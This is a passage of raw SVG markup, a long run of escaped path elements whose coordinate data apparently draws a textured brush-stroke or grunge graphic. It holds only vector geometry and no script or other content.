d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path 